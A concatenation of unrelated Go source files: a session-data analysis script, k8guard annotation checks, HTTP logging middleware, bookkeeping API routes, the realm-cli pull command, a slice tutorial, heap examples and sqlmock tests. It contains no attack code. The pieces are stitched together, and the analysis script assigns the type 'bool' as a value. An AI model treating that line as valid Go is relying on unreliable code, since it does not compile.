orderScanner := bufio.NewScanner(f2)
orderMap := make(map[string]map[string]bool)
for orderScanner.Scan() {
fields := strings.Split(orderScanner.Text(), "\t")
uid := fields[0]
dt := fields[1]
if _, ok := orderMap[uid]; !ok {
orderMap[uid] = make(map[string]bool)
}
orderMap[uid][dt] = bool
}
userData := make(map[string]map[string][]sessionRecord)
loc := time.FixedZone("UTC+3", int((3 * time.Hour).Seconds()))
f, _ := os.Open("/Users/yongweixing/dev/darwin_seq/darwin_session_0517_0617.tsv")
defer f.Close()
scanner := bufio.NewScanner(f)
for scanner.Scan() {
fields := strings.Split(scanner.Text(), "\t")
uid := fields[0]
sessTS, _ := strconv.ParseInt(fields[2], 10, 64)
consumTS, _ := strconv.ParseInt(fields[11], 10, 64)
idx, _ := strconv.Atoi(fields[8])
sessType := fields[9]
correctRatio, _ := strconv.ParseFloat(fields[12], 64)
sessModule := fields[13]
//dateStr := fields[len(fields)-1]
sessTime := time.Unix(int64(sessTS/1000000), 0).In(loc)
consumTime := time.Unix(int64(consumTS/1000000), 0).In(loc)
//t := time.Unix(int64(sessTS/1000000), 0)
if sessTime.Format("2006-01-02") != consumTime.Format("2006-01-02") {
continue
}
date := sessTime.Format("2006-01-02")
sessRecord := sessionRecord{
Idx: idx,
Type: sessType,
Module: sessModule,
CorrectRatio: correctRatio,
}
if _, ok := userData[uid]; !ok {
userData[uid] = make(map[string][]sessionRecord)
}
userData[uid][date] = append(userData[uid][date], sessRecord)
}
userData2 := make(map[string][][]sessionRecord)
firstDate := Date(2019, 5, 17)
for uid, uData := range userData {
userData2[uid] = make([][]sessionRecord, 32)
for d, records := range uData {
days := int(parseToDate(d).Sub(firstDate).Hours() / 24)
if days < 0 {
continue
}
if days > 31 {
continue
}
userData2[uid][days] = append(userData2[uid][days], records...)
}
}
typeCounterByPos := make(map[string]map[int]int)
for _, udata := range userData2 {
for day, records := range udata {
if len(records) == 0 {
continue
}
if day+3 > len(udata)-1 {
continue
}
if len(udata[day+1]) == 0 && len(udata[day+2]) == 0 && len(udata[day+3]) == 0 {
continue
}
for i, r := range records {
if _, ok := typeCounterByPos[r.Type]; !ok {
typeCounterByPos[r.Type] = make(map[int]int)
}
typeCounterByPos[r.Type][i]++
}
}
}
for t, values := range typeCounterByPos {
for pos, c := range values {
if pos > 7 {
continue
}
fmt.Printf("type %v pos %v counter %v\n", t, pos, c)
}
}
// gap := 14
// for uid, uData := range userData2 {
// for start, records := range uData {
// end := start + 14
// if end > len(records)-5 {
// continue
// }
// }
// }
fmt.Println(len(userData))
}
// func getTypeNdaysNumber(srs [][]sessionRecord, n int) map[string]int {
// tn := make(map[string]int)
// if n < 0 || n > len(srs) {
// n = len(srs)
// }
// for _, ss := range srs[len(srs)-n:] {
// for _, s := range ss {
// tn[s.Type]++
// }
// }
// return tn
// }
// func getModuleNdaysNumber(srs [][]sessionRecord, n int) map[string]int {
// mn := make(map[string]int)
// if n < 0 || n > len(srs) {
// n = len(srs)
// }
// for _, ss := range srs[len(srs)-n:] {
// for _, s := range ss {
// mn[s.Module]++
// }
// }
// return mn
// }
// func defaultSlotNumberByNdaysAndRatio(srs [][]sessionRecord, n int) (int, float64) {
// res := 0
// total := 0
// ratio := 0.0
// if n < 0 || n > len(srs) {
// n = len(srs)
// }
// for _, ss := range srs[len(srs)-n:] {
// total += len(ss)
// for _, s := range ss {
// if s.Idx == 0 {
// res += 1
// }
// }
// }
// if total > 0 {
// ratio = float64(res * 1.0 / total)
// }
// return res, ratio
// }
// func getAverageCorrectRatioLatesNDaysByType(srs [][]sessionRecord, n int) map[string]float64 {
// corr := make(map[string]float64)
// nums := make(map[string]int)
// totalRa := make(map[string]float64)
// if n < 0 || n > len(srs) {
// n = len(srs)
// }
// for _, ss := range srs[len(srs)-n:] {
// for _, s := range ss {
// nums[s.Type] += 1
// totalRa[s.Type] += s.CorrectRatio
// }
// }
// for k, v := range nums {
// corr[k] = totalRa[k] / float64(v)
// }
// return corr
// }
func parseToDate(s string) time.Time {
fields := strings.Split(s, "-")
year, _ := strconv.Atoi(fields[0])
month, _ := strconv.Atoi(fields[1])
day, _ := strconv.Atoi(fields[2])
return Date(year, month, day)
}
func Date(year, month, day int) time.Time {
return time.Date(year, time.Month(month), day, 0, 0, 0, 0, time.UTC)
}
|
package discover
import (
"github.com/k8guard/k8guard-discover/rules"
lib "github.com/k8guard/k8guardlibs"
"github.com/k8guard/k8guardlibs/violations"
)
// verify whether a specific annotation(s) exist
func verifyRequiredAnnotations(annotations map[string]string, entity *lib.ViolatableEntity, entityType string, violation violations.ViolationType) {
if rules.IsNotIgnoredViolation(entity.Namespace, entityType, entity.Name, violations.REQUIRED_ANNOTATIONS_TYPE) {
if found, source, _ := rules.IsValuesMatchesRequiredRule(entity.Namespace, entityType, entity.Name, annotations, lib.Cfg.RequiredAnnotations); !found {
entity.Violations = append(entity.Violations, violations.Violation{Source: source, Type: violation})
}
}
}
// verify whether a specific label(s) exists
func verifyRequiredLabels(labels map[string]string, entity *lib.ViolatableEntity, entityType string, violation violations.ViolationType) {
if rules.IsNotIgnoredViolation(entity.Namespace, entityType, entity.Name, violations.REQUIRED_LABELS_TYPE) {
if found, source, _ := rules.IsValuesMatchesRequiredRule(entity.Namespace, entityType, entity.Name, labels, lib.Cfg.RequiredLabels); !found {
entity.Violations = append(entity.Violations, violations.Violation{Source: source, Type: violation})
}
}
}
|
package middleware
import (
"fmt"
"net/http"
"time"
"github.com/sirupsen/logrus"
)
type HTTPRecorder struct {
w http.ResponseWriter
req *http.Request
status int
body []byte
start time.Time
}
func (r *HTTPRecorder) Header() http.Header {
return r.w.Header()
}
func (r *HTTPRecorder) Write(b []byte) (int, error) {
r.body = b
return r.w.Write(b)
}
func (r *HTTPRecorder) WriteHeader(statusCode int) {
r.status = statusCode
r.w.WriteHeader(statusCode)
}
func (r *HTTPRecorder) LogRequest() {
agent := r.req.Header.Get("User-Agent")
conn := r.req.Header.Get("Connection")
headersSet := fmt.Sprintf("Host: %q Connection: %q User-Agent: %q", r.req.Host, conn, agent)
logrus.Infof("%s %s %s %s", r.req.Method, r.req.RequestURI, r.req.Proto, headersSet)
}
func (r *HTTPRecorder) LogResponse() {
// log response body if error
if r.status > http.StatusOK {
logrus.Errorf("[%d] %s %q %s", r.status, r.req.RequestURI, string(r.body), time.Since(r.start))
return
}
logrus.Infof("[%d] %s %s", r.status, r.req.RequestURI, time.Since(r.start))
}
|
package routes
import (
"github.com/gorilla/mux"
"github.com/huf0813/pembukuan_tk/ctr"
"github.com/huf0813/pembukuan_tk/middleware"
"net/http"
)
type Route struct {
HomeCTR ctr.HomeCTR
AuthCTR ctr.AuthCTR
UserCTR ctr.UserCTR
ProductCTR ctr.ProductCTR
InvoiceCTR ctr.InvoiceCTR
CustomerCTR ctr.CustomerCTR
AdminCTR ctr.AdminCTR
Auth middleware.TokenMiddleware
}
type RouteInterface interface {
Routes() *mux.Router
}
func (r *Route) Routes() *mux.Router {
route := mux.NewRouter()
// welcome to API
route.HandleFunc("/", r.HomeCTR.Welcome).Methods("GET")
// auth
route.HandleFunc("/login", r.AuthCTR.Login).Methods("POST")
route.HandleFunc("/token/expired", r.AuthCTR.CheckToken).Methods("POST")
// users
route.Handle("/dashboard", r.Auth.TokenMiddlewareIsUser(http.HandlerFunc(r.UserCTR.DashboardUser))).Methods("GET")
route.Handle("/customers", r.Auth.TokenMiddlewareIsUser(http.HandlerFunc(r.CustomerCTR.CustomerRegister))).Methods("POST")
route.Handle("/customers/delete", r.Auth.TokenMiddlewareIsUser(http.HandlerFunc(r.CustomerCTR.DeleteCustomer))).Methods("POST")
route.Handle("/customers", r.Auth.TokenMiddlewareIsUser(http.HandlerFunc(r.CustomerCTR.FetchCustomers))).Methods("GET")
route.Handle("/customers", r.Auth.TokenMiddlewareIsUser(http.HandlerFunc(r.CustomerCTR.EditCustomer))).Methods("PUT")
route.Handle("/products", r.Auth.TokenMiddlewareIsUser(http.HandlerFunc(r.ProductCTR.GetProducts))).Methods("GET")
route.Handle("/products", r.Auth.TokenMiddlewareIsUser(http.HandlerFunc(r.ProductCTR.AddProduct))).Methods("POST")
route.Handle("/products/delete", r.Auth.TokenMiddlewareIsUser(http.HandlerFunc(r.ProductCTR.DeleteProduct))).Methods("POST")
route.Handle("/products", r.Auth.TokenMiddlewareIsUser(http.HandlerFunc(r.ProductCTR.EditProduct))).Methods("PUT")
route.Handle("/products/stock", r.Auth.TokenMiddlewareIsUser(http.HandlerFunc(r.ProductCTR.AddProductStock))).Methods("POST")
route.Handle("/invoice", r.Auth.TokenMiddlewareIsUser(http.HandlerFunc(r.InvoiceCTR.AddNewInvoice))).Methods("POST")
route.Handle("/invoice", r.Auth.TokenMiddlewareIsUser(http.HandlerFunc(r.InvoiceCTR.GetInvoices))).Methods("GET")
route.Handle("/invoice/detail", r.Auth.TokenMiddlewareIsUser(http.HandlerFunc(r.InvoiceCTR.GetInvoiceByID))).Methods("POST")
route.Handle("/statistics", r.Auth.TokenMiddlewareIsUser(http.HandlerFunc(r.InvoiceCTR.GetStatistics))).Methods("POST")
// admins
route.Handle("/admin/dashboard", r.Auth.TokenMiddlewareIsAdmin(http.HandlerFunc(r.AdminCTR.DashboardAdmin))).Methods("GET")
route.Handle("/admin/customers", r.Auth.TokenMiddlewareIsAdmin(http.HandlerFunc(r.CustomerCTR.CustomerRegister))).Methods("POST")
route.Handle("/admin/customers/delete", r.Auth.TokenMiddlewareIsAdmin(http.HandlerFunc(r.CustomerCTR.DeleteCustomer))).Methods("POST")
route.Handle("/admin/customers", r.Auth.TokenMiddlewareIsAdmin(http.HandlerFunc(r.CustomerCTR.FetchCustomers))).Methods("GET")
route.Handle("/admin/customers", r.Auth.TokenMiddlewareIsAdmin(http.HandlerFunc(r.CustomerCTR.EditCustomer))).Methods("PUT")
route.Handle("/admin/products", r.Auth.TokenMiddlewareIsAdmin(http.HandlerFunc(r.ProductCTR.GetProducts))).Methods("GET")
route.Handle("/admin/products", r.Auth.TokenMiddlewareIsAdmin(http.HandlerFunc(r.ProductCTR.AddProduct))).Methods("POST")
route.Handle("/admin/products/delete", r.Auth.TokenMiddlewareIsAdmin(http.HandlerFunc(r.ProductCTR.DeleteProduct))).Methods("POST")
route.Handle("/admin/products", r.Auth.TokenMiddlewareIsAdmin(http.HandlerFunc(r.ProductCTR.EditProduct))).Methods("PUT")
route.Handle("/admin/products/stock", r.Auth.TokenMiddlewareIsAdmin(http.HandlerFunc(r.ProductCTR.AddProductStock))).Methods("POST")
route.Handle("/admin/invoice", r.Auth.TokenMiddlewareIsAdmin(http.HandlerFunc(r.InvoiceCTR.AddNewInvoice))).Methods("POST")
route.Handle("/admin/invoice", r.Auth.TokenMiddlewareIsAdmin(http.HandlerFunc(r.InvoiceCTR.GetInvoices))).Methods("GET")
route.Handle("/admin/invoice/detail", r.Auth.TokenMiddlewareIsAdmin(http.HandlerFunc(r.InvoiceCTR.GetInvoiceByID))).Methods("POST")
route.Handle("/admin/users", r.Auth.TokenMiddlewareIsAdmin(http.HandlerFunc(r.UserCTR.FetchUsers))).Methods("GET")
route.Handle("/admin/users", r.Auth.TokenMiddlewareIsAdmin(http.HandlerFunc(r.UserCTR.AddUser))).Methods("POST")
route.Handle("/admin/users/delete", r.Auth.TokenMiddlewareIsAdmin(http.HandlerFunc(r.UserCTR.DeletedUser))).Methods("POST")
route.Handle("/admin/users", r.Auth.TokenMiddlewareIsAdmin(http.HandlerFunc(r.UserCTR.EditedUser))).Methods("PUT")
route.Handle("/admin/statistics", r.Auth.TokenMiddlewareIsAdmin(http.HandlerFunc(r.InvoiceCTR.GetStatistics))).Methods("POST")
return route
}
|
package pull
import (
"archive/zip"
"fmt"
"io"
"os"
"path/filepath"
"strings"
"github.com/10gen/realm-cli/internal/cli"
"github.com/10gen/realm-cli/internal/cli/user"
"github.com/10gen/realm-cli/internal/cloud/realm"
"github.com/10gen/realm-cli/internal/local"
"github.com/10gen/realm-cli/internal/terminal"
"github.com/10gen/realm-cli/internal/utils/flags"
)
const (
flagIncludeNodeModules = "include-node-modules"
flagIncludePackageJSON = "include-package-json"
flagIncludeDependencies = "include-dependencies"
)
// CommandMeta is the command meta for the `pull` command
var CommandMeta = cli.CommandMeta{
Use: "pull",
Aliases: []string{"export"},
Description: "Exports the latest version of your Realm app into your local directory",
HelpText: `Pulls changes from your remote Realm app into your local directory. If
applicable, Hosting Files and/or Dependencies associated with your Realm app will be
exported as well.`,
}
// Command is the `pull` command
type Command struct {
inputs inputs
}
// Flags is the command flags
func (cmd *Command) Flags() []flags.Flag {
return []flags.Flag{
flags.StringFlag{
Value: &cmd.inputs.LocalPath,
Meta: flags.Meta{
Name: "local",
Usage: flags.Usage{
Description: "Specify a local filepath to export a Realm app to",
},
},
},
flags.StringFlag{
Value: &cmd.inputs.RemoteApp,
Meta: flags.Meta{
Name: "remote",
Usage: flags.Usage{
Description: "Specify the name or ID of a remote Realm app to export",
},
},
},
flags.BoolFlag{
Value: &cmd.inputs.IncludeNodeModules,
Meta: flags.Meta{
Name: flagIncludeNodeModules,
Usage: flags.Usage{
Description: "Export and include Realm app dependencies from a node_modules archive",
Note: "The allowed formats are as a directory or compressed into a .zip, .tar, .tar.gz, or .tgz file",
},
},
},
flags.BoolFlag{
Value: &cmd.inputs.IncludePackageJSON,
Meta: flags.Meta{
Name: flagIncludePackageJSON,
Usage: flags.Usage{
Description: "Export and include Realm app dependencies from a package.json file",
},
},
},
// TODO(REALMC-10088): Remove this flag in realm-cli 3.x
flags.BoolFlag{
Value: &cmd.inputs.IncludeDependencies,
Meta: flags.Meta{
Name: flagIncludeDependencies,
Shorthand: "d",
Usage: flags.Usage{
Description: "Export and include Realm app dependencies from a node_modules archive",
Note: "The allowed formats are as a directory or compressed into a .zip, .tar, .tar.gz, or .tgz file",
},
Deprecate: fmt.Sprintf("support will be removed in v3.x, please use %q instead", flagIncludeNodeModules),
},
},
flags.BoolFlag{
Value: &cmd.inputs.IncludeHosting,
Meta: flags.Meta{
Name: "include-hosting",
Shorthand: "s",
Usage: flags.Usage{
Description: "Export and include Realm app hosting files",
},
},
},
flags.BoolFlag{
Value: &cmd.inputs.DryRun,
Meta: flags.Meta{
Name: "dry-run",
Shorthand: "x",
Usage: flags.Usage{
Description: "Run without writing any changes to the local filepath",
},
},
},
flags.StringSliceFlag{
Value: &cmd.inputs.TemplateIDs,
Meta: flags.Meta{
Name: "template",
Shorthand: "t",
Usage: flags.Usage{
Description: "Specify the frontend Template ID(s) to export.",
Note: "Specified templates must be compatible with the remote app",
AllowedValues: realm.AllowedTemplates,
},
},
},
cli.ProjectFlag(&cmd.inputs.Project),
cli.ConfigVersionFlag(&cmd.inputs.AppVersion, "Specify the app config version to export as"),
}
}
// Inputs is the command inputs
func (cmd *Command) Inputs() cli.InputResolver {
return &cmd.inputs
}
// Handler is the command handler
func (cmd *Command) Handler(profile *user.Profile, ui terminal.UI, clients cli.Clients) error {
app, err := cmd.inputs.resolveRemoteApp(ui, clients)
if err != nil {
return err
}
var clientTemplates []clientTemplate
if app.TemplateID != "" {
clientTemplates, err = cmd.inputs.resolveClientTemplates(clients.Realm, app.GroupID, app.ID)
if err != nil {
return err
}
}
pathProject, zipPkg, err := cmd.doExport(profile, clients.Realm, app.GroupID, app.ID)
if err != nil {
return err
}
// App path
proceed, err := checkPathDestination(ui, pathProject)
if err != nil {
return err
} else if !proceed {
return nil
}
pathRelative, err := filepath.Rel(profile.WorkingDirectory, pathProject)
if err != nil {
return err
}
var pathFrontend string
pathBackend := pathProject
if len(clientTemplates) != 0 {
pathFrontend = filepath.Join(pathProject, local.FrontendPath)
pathBackend = filepath.Join(pathProject, local.BackendPath)
}
if cmd.inputs.DryRun {
logs := make([]terminal.Log, 0, 3)
logs = append(logs, terminal.NewTextLog("No changes were written to your file system"))
if len(clientTemplates) != 0 {
logs = append(logs,
terminal.NewDebugLog("App contents would have been written to: %s", filepath.Join(pathRelative, local.BackendPath)),
terminal.NewDebugLog("Template contents would have been written to: %s", filepath.Join(pathRelative, local.FrontendPath)),
)
} else {
logs = append(logs, terminal.NewDebugLog("Contents would have been written to: %s", pathRelative))
}
ui.Print(logs...)
return nil
}
if err := local.WriteZip(pathBackend, zipPkg); err != nil {
return fmt.Errorf("unable to write app to disk: %s", err)
}
ui.Print(terminal.NewTextLog("Saved app to disk"))
if cmd.inputs.IncludeNodeModules || cmd.inputs.IncludePackageJSON || cmd.inputs.IncludeDependencies {
logStr := "as a node_modules archive"
if cmd.inputs.IncludePackageJSON {
logStr = "as a package.json file"
}
s := ui.Spinner(fmt.Sprintf("Fetching dependencies %s...", logStr), terminal.SpinnerOptions{})
var packageJSONMissing bool
exportDependencies := func() error {
s.Start()
defer s.Stop()
fileName, file, err := cmd.exportDependencies(clients, app)
if err != nil {
return err
}
if cmd.inputs.IncludePackageJSON && fileName != local.NamePackageJSON {
packageJSONMissing = true
}
return local.WriteFile(
filepath.Join(pathBackend, local.NameFunctions, fileName),
0666,
file,
)
}
if err := exportDependencies(); err != nil {
return err
}
if packageJSONMissing {
logStr = "as a node_modules archive"
}
ui.Print(terminal.NewTextLog("Fetched dependencies " + logStr))
if packageJSONMissing {
ui.Print(terminal.NewWarningLog("The package.json file was not found, a node_modules archive was written instead"))
}
}
if cmd.inputs.IncludeHosting {
s := ui.Spinner("Fetching hosting assets...", terminal.SpinnerOptions{})
exportHostingAssets := func() error {
s.Start()
defer s.Stop()
appAssets, err := clients.Realm.HostingAssets(app.GroupID, app.ID)
if err != nil {
return err
}
return local.WriteHostingAssets(clients.HostingAsset, pathBackend, app.GroupID, app.ID, appAssets)
}
if err := exportHostingAssets(); err != nil {
return err
}
ui.Print(terminal.NewDebugLog("Fetched hosting assets"))
}
successfulTemplateWrites := make([]string, 0, len(clientTemplates))
for _, ct := range clientTemplates {
if err := local.WriteZip(filepath.Join(pathFrontend, ct.id), ct.zipPkg); err != nil {
return fmt.Errorf("unable to save template '%s' to disk: %s", ct.id, err)
}
successfulTemplateWrites = append(successfulTemplateWrites, ct.id)
}
ui.Print(terminal.NewTextLog("Successfully pulled app down: %s", pathRelative))
if len(successfulTemplateWrites) != 0 {
ui.Print(terminal.NewListLog("Successfully saved template(s) to disk", successfulTemplateWrites))
}
return nil
}
func (cmd *Command) doExport(profile *user.Profile, realmClient realm.Client, groupID, appID string) (string, *zip.Reader, error) {
name, zipPkg, err := realmClient.Export(
groupID,
appID,
realm.ExportRequest{ConfigVersion: cmd.inputs.AppVersion},
)
if err != nil {
return "", nil, err
}
pathLocal := cmd.inputs.LocalPath
if pathLocal == "" {
if idx := strings.LastIndex(name, "_"); idx != -1 {
name = name[:idx]
}
pathLocal = name
}
if filepath.IsAbs(pathLocal) {
pathLocal, err = filepath.Rel(profile.WorkingDirectory, pathLocal)
if err != nil {
return "", nil, err
}
}
target := filepath.Join(profile.WorkingDirectory, pathLocal)
return target, zipPkg, nil
}
func checkPathDestination(ui terminal.UI, path string) (bool, error) {
if ui.AutoConfirm() {
return true, nil
}
fileInfo, err := os.Stat(path)
if err != nil {
if os.IsNotExist(err) {
return true, nil
}
return false, err
}
if !fileInfo.IsDir() {
return true, nil
}
return ui.Confirm("Directory '%s' already exists, do you still wish to proceed?", path)
}
func (cmd *Command) exportDependencies(clients cli.Clients, app realm.App) (string, io.ReadCloser, error) {
if cmd.inputs.IncludePackageJSON {
return clients.Realm.ExportDependencies(app.GroupID, app.ID)
}
return clients.Realm.ExportDependenciesArchive(app.GroupID, app.ID)
}
|
package main
import "fmt"
// make()函数创造切片(可以指定长度和容量)
// make([]T,len,cap)
func main() {
s1 := make([]int, 5) //cap省略的时候默认等于len
s2 := make([]int, 5, 10)
fmt.Printf("s1=%v len(s1)=%d cap(s1)=%d\n", s1, len(s1), cap(s1))
fmt.Printf("s2=%v len(s2)=%d cap(s2)=%d\n", s2, len(s2), cap(s2))
//判断切片是否为空,应该判断len是否为0
//切片的赋值
s3 := []int{1, 3, 5}
s4 := s3
fmt.Println(s3, s4)
s3[0] = 1000 //切片是引用类型,s3和s4指向的是同一个底层数组
fmt.Println(s3, s4)
//切片遍历
for i := 0; i < len(s3); i++ {
fmt.Println(s3[i])
}
for i, v := range s3 {
fmt.Println(i, v)
}
}
|
package heap_util
import (
"container/heap"
"fmt"
)
// This example inserts several ints into an IntHeap, checks the minimum,
// and removes them in order of priority.
func Example_intHeap() {
h := &IntHeap{2, 1, 5}
heap.Init(h)
heap.Push(h, 3)
fmt.Printf("minimum: %d\n", (*h)[0])
for h.Len() > 0 {
fmt.Printf("%d ", heap.Pop(h))
}
// Output:
// minimum: 1
// 1 2 3 5
}
// This example inserts several ints into an IntHeap, checks the minimum,
// and removes them in order of priority.
func Example_int64Heap() {
h := &Int64Heap{2, 1, 5}
heap.Init(h)
heap.Push(h, int64(3))
fmt.Printf("minimum: %d\n", (*h)[0])
for h.Len() > 0 {
fmt.Printf("%d ", heap.Pop(h))
}
// Output:
// minimum: 1
// 1 2 3 5
}
func Example_stringHeap() {
h := &StringHeap{"abc", "bca", "cba"}
heap.Init(h)
heap.Push(h,"cab")
fmt.Printf("minimum: %s\n", (*h)[0])
for h.Len() > 0 {
fmt.Printf("%s ", heap.Pop(h))
}
// Output:
// minimum: abc
// abc bca cab cba
}
|
package repository
import (
. "2019_2_IBAT/pkg/pkg/models"
"fmt"
"reflect"
"testing"
"github.com/google/uuid"
"github.com/jmoiron/sqlx"
"github.com/pkg/errors"
sqlmock "gopkg.in/DATA-DOG/go-sqlmock.v1"
)
func TestDBUserStorage_GetSeekers_Correct(t *testing.T) {
db, mock, err := sqlmock.New()
defer db.Close()
sqlxDB := sqlx.NewDb(db, "sqlmock")
if err != nil {
t.Fatalf("cant create mock: %s", err)
}
rows := sqlmock.
NewRows([]string{"id", "email", "first_name", "second_name", "path_to_image"})
rows_resumes_id1 := sqlmock.NewRows([]string{"id"})
rows_resumes_id2 := sqlmock.NewRows([]string{"id"})
expect := []Seeker{
{
ID: uuid.MustParse("f14c6104-3430-413b-ab4e-e31c8642ad8a"),
Email: "some@mail.ru",
FirstName: "Victor",
SecondName: "Timofeev",
PathToImg: "",
Resumes: []uuid.UUID{uuid.MustParse("92b77a73-bac7-4597-ab71-7b5fbe53052d")},
},
{
ID: uuid.MustParse("f14c6111-3430-413b-ab4e-e31c8642ad8a"),
Email: "some@mail.ru",
FirstName: "Victor",
SecondName: "Timofeev",
PathToImg: "",
Resumes: []uuid.UUID{uuid.MustParse("11b77a73-bac7-4597-ab71-7b5fbe53052d")},
},
}
for _, item := range expect {
rows = rows.AddRow(item.ID.String(), item.Email, item.FirstName, item.SecondName,
item.PathToImg,
)
}
mock.
ExpectQuery("SELECT id, email, first_name, second_name," +
"path_to_image FROM persons WHERE").
WithArgs(SeekerStr).
WillReturnRows(rows)
rows_resumes_id1 = rows_resumes_id1.AddRow(uuid.MustParse("92b77a73-bac7-4597-ab71-7b5fbe53052d").String())
mock.
ExpectQuery("SELECT r.id FROM resumes AS r WHERE").
WithArgs(expect[0].ID).
WillReturnRows(rows_resumes_id1)
rows_resumes_id2 = rows_resumes_id2.AddRow(uuid.MustParse("11b77a73-bac7-4597-ab71-7b5fbe53052d").String())
mock.
ExpectQuery("SELECT r.id FROM resumes AS r WHERE").
WithArgs(expect[1].ID).
WillReturnRows(rows_resumes_id2)
repo := DBUserStorage{
DbConn: sqlxDB,
}
seekers, err := repo.GetSeekers()
if err != nil {
t.Errorf("unexpected err: %s", err)
return
}
if err := mock.ExpectationsWereMet(); err != nil {
t.Errorf("there were unfulfilled expectations: %s", err)
return
}
if !reflect.DeepEqual(seekers, expect) {
t.Errorf("results not match,\n want\n%v,\n have\n %v\n", expect, seekers)
return
}
}
func TestDBUserStorage_GetSeekers_Fail(t *testing.T) { //ADD SECOND SELECT TEST CASE
db, mock, err := sqlmock.New()
defer db.Close()
sqlxDB := sqlx.NewDb(db, "sqlmock")
if err != nil {
t.Fatalf("cant create mock: %s", err)
}
mock.
ExpectQuery("SELECT id, email, first_name, second_name," +
"path_to_image FROM persons WHERE").
WithArgs().
WillReturnError(errors.New("GetSeeker: error while query seekers"))
repo := DBUserStorage{
DbConn: sqlxDB,
}
seekers, err := repo.GetSeekers()
fmt.Println(seekers)
if err == nil {
fmt.Println(err)
t.Errorf("Expected err")
return
}
if err := mock.ExpectationsWereMet(); err != nil {
t.Errorf("there were unfulfilled expectations: %s", err)
return
}
}
func TestDBUserStorage_GetSeeker_Correct(t *testing.T) {
db, mock, err := sqlmock.New()
defer db.Close()
sqlxDB := sqlx.NewDb(db, "sqlmock")
if err != nil {
t.Fatalf("cant create mock: %s", err)
}
defer sqlxDB.Close()
rows := sqlmock.
NewRows([]string{"id", "email", "first_name", "second_name", "path_to_image"})
rows_resumes_id1 := sqlmock.NewRows([]string{"id"})
expect := Seeker{
ID: uuid.MustParse("f14c6104-3430-413b-ab4e-e31c8642ad8a"),
Email: "some@mail.ru",
FirstName: "Victor",
SecondName: "Timofeev",
PathToImg: "",
Resumes: []uuid.UUID{uuid.MustParse("92b77a73-bac7-4597-ab71-7b5fbe53052d")},
}
rows = rows.AddRow(expect.ID.String(), expect.Email, expect.FirstName,
expect.SecondName, expect.PathToImg,
)
mock.
ExpectQuery("SELECT id, email, first_name, second_name, " +
"path_to_image FROM persons WHERE").
WithArgs(expect.ID).
WillReturnRows(rows)
rows_resumes_id1 = rows_resumes_id1.AddRow(uuid.MustParse("92b77a73-bac7-4597-ab71-7b5fbe53052d").String())
mock.
ExpectQuery("SELECT r.id FROM resumes AS r WHERE").
WithArgs(expect.ID).
WillReturnRows(rows_resumes_id1)
repo := DBUserStorage{
DbConn: sqlxDB,
}
item, err := repo.GetSeeker(expect.ID)
if err != nil {
t.Errorf("unexpected err: %s", err)
return
}
if err := mock.ExpectationsWereMet(); err != nil {
t.Errorf("there were unfulfilled expectations: %s", err)
return
}
if !reflect.DeepEqual(item, expect) {
t.Errorf("results not match,\n want\n%v,\n have\n %v\n", expect, item)
return
}
}
func TestDBUserStorage_GetSeeker_Fail(t *testing.T) {
db, mock, err := sqlmock.New()
defer db.Close()
sqlxDB := sqlx.NewDb(db, "sqlmock")
if err != nil {
t.Fatalf("cant create mock: %s", err)
}
defer sqlxDB.Close()
id := uuid.MustParse("f14c6104-3430-413b-ab4e-e31c8642bbba")
mock.
ExpectQuery("SELECT id, email, first_name, second_name, " +
"path_to_image FROM persons WHERE ").
WithArgs(id).
WillReturnError(errors.New("sql: no rows in result set"))
repo := DBUserStorage{
DbConn: sqlxDB,
}
seeker, err := repo.GetSeeker(id)
fmt.Println(seeker)
if err == nil {
fmt.Println(err)
t.Errorf("Expected err")
return
}
if err := mock.ExpectationsWereMet(); err != nil {
t.Errorf("there were unfulfilled expectations: %s", err)
return
}
}
func TestDBUserStorage_GetSeeker_Fail2(t *testing.T) {
db, mock, err := sqlmock.New()
defer db.Close()
sqlxDB := sqlx.NewDb(db, "sqlmock")
if err != nil {
t.Fatalf("cant create mock: %s", err)
}
defer sqlxDB.Close()
rows := sqlmock.
NewRows([]string{"id", "email", "first_name", "second_name", "path_to_image"})
expect := Seeker{
ID: uuid.MustParse("f14c6104-3430-413b-ab4e-e31c8642bbba"),
Email: "some@mail.ru",
FirstName: "Victor",
SecondName: "Timofeev",
PathToImg: "",
Resumes: []uuid.UUID{uuid.MustParse("92b77a73-bac7-4597-ab71-7b5fbe53052d")},
}
rows = rows.AddRow(expect.ID.String(), expect.Email, expect.FirstName,
expect.SecondName, expect.PathToImg,
)
id := uuid.MustParse("f14c6104-3430-413b-ab4e-e31c8642bbba")
mock.
ExpectQuery("SELECT id, email, first_name, second_name, " +
"path_to_image FROM persons WHERE ").
WithArgs(id).
WillReturnRows(rows)
mock.
ExpectQuery("SELECT r.id FROM resumes AS r WHERE").
WithArgs(id).
WillReturnError(errors.New("GetSeeker: Invalid id"))
repo := DBUserStorage{
DbConn: sqlxDB,
}
seeker, err := repo.GetSeeker(id)
fmt.Println(seeker)
if err == nil {
fmt.Println(err)
t.Errorf("Expected err")
return
}
if err := mock.ExpectationsWereMet(); err != nil {
t.Errorf("there were unfulfilled expectations: %s", err)
return
}
}
func TestDBUserStorage_CreateSeeker_Correct(t *testing.T) {
db, mock, err := sqlmock.New()
defer db.Close()
sqlxDB := sqlx.NewDb(db, "sqlmock")
if err != nil {
t.Fatalf("cant create mock: %s", err)
}
defer sqlxDB.Close()
seeker := Seeker{
ID: uuid.MustParse("f14c6104-3430-413b-ab4e-e31c8642bbba"),
Email: "some@mail.ru",
FirstName: "Victor",
SecondName: "Timofeev",
PathToImg: "",
Resumes: []uuid.UUID{uuid.MustParse("92b77a73-bac7-4597-ab71-7b5fbe53052d")},
}
mock.
ExpectExec(`INSERT INTO persons`).
WithArgs(
seeker.ID, seeker.Email, seeker.FirstName,
seeker.SecondName, seeker.Password, SeekerStr, seeker.PathToImg,
).
WillReturnResult(sqlmock.NewResult(1, 1))
repo := DBUserStorage{
DbConn: sqlxDB,
}
ok := repo.CreateSeeker(seeker)
if !ok {
t.Error("Failed to create vacancy\n")
return
}
}
func TestDBUserStorage_CreateSeeker_False(t *testing.T) {
db, mock, err := sqlmock.New()
defer db.Close()
sqlxDB := sqlx.NewDb(db, "sqlmock")
if err != nil {
t.Fatalf("cant create mock: %s", err)
}
defer sqlxDB.Close()
seeker := Seeker{
ID: uuid.MustParse("f14c6104-3430-413b-ab4e-e31c8642bbba"),
Email: "some@mail.ru",
FirstName: "Victor",
SecondName: "Timofeev",
PathToImg: "",
Resumes: []uuid.UUID{uuid.MustParse("92b77a73-bac7-4597-ab71-7b5fbe53052d")},
}
mock.
ExpectExec(`INSERT INTO persons`).
WithArgs(
